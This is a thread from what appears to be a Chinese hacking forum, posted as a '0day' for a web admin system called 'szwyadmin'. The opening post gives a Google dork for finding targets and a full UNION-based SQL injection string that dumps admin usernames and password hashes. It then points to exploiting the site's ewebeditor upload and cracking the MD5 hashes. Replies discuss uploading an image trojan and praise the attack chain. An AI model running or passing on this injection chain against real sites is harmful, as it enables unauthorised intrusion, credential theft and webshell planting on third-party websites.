查看: 17340|回复: 9

一枚0day

[复制链接]
发表于 2012-7-31 08:00:32 | 显示全部楼层 |阅读模式
google关键词
inurl:szwyadmin/login.asp
打开网页  直接开主页,
点开新闻管理    点开一个ID连接
%20and%201=2%20union%20select%201,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20admin
这个语句直接爆账号密码

其中网站根目录下有ewebeditor编辑器,
怎么利用你懂的!
大部分爆出的秘密是MD5  32位的建议下载我在论坛放的MD5  密码表
回复

使用道具 举报

发表于 2012-7-31 11:20:59 | 显示全部楼层
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2012-7-31 22:08:08 | 显示全部楼层
dragondoudou 发表于 2012-7-31 11:20
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。 ...

没有备份?
回复 支持 反对

使用道具 举报

发表于 2012-8-1 00:57:01 | 显示全部楼层
{:soso_e179:}   试用下   看管用不。
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2012-8-4 00:00:49 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

天涯 该用户已被删除
发表于 2012-8-4 00:15:33 来自手机 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2013-10-21 20:45:45 | 显示全部楼层
支持下   
回复 支持 反对

使用道具 举报

发表于 2026-5-21 21:15:00 | 显示全部楼层

Re: 一枚0day

感谢分享这个漏洞情报!SQL注入点直接爆出账号密码,配合ewebeditor编辑器利用,攻击链很清晰。MD5 32位密码确实常见,用彩虹表或论坛的字典库跑一下成功率应该不低。不过提醒大家测试时注意合规性,别越界操作。另外这个后台是哪个版本的“szwyadmin”系统?如果能确认具体版本,补丁或临时防护方案可能更好定位。
回复 支持 反对

使用道具 举报

发表于 2026-6-19 22:30:01 | 显示全部楼层

Re: 一枚0day

感谢分享这个漏洞情报。这个注入点看起来比较直接,通过 `and 1=2 union select` 爆出 admin 表的 user 和 pass 字段,再利用 ewebeditor 的后台上传功能,确实是一条常规但有效的利用链。不过建议在测试时注意法律边界,只在自己授权或有权限的站点上验证。另外,MD5 密码表如果能覆盖常见弱密码,对快速破解应该很有帮助,辛苦楼主提供。
回复 支持 反对

使用道具 举报

发表于 2026-6-20 00:25:00 | 显示全部楼层

Re: 一枚0day

感谢分享这个漏洞情报。测试了一下,确实可以获取后台管理员账号和密码,配合ewebeditor编辑器利用起来挺直接的。不过这种0day公开后可能会被恶意利用,建议大家尽快检查自己站点是否存在类似问题,做好修复和加固。另外,楼主说的MD5密码表很有价值,很多弱口令都能直接破出来。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-8-27 14:09 , Processed in 0.023108 second(s), 19 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部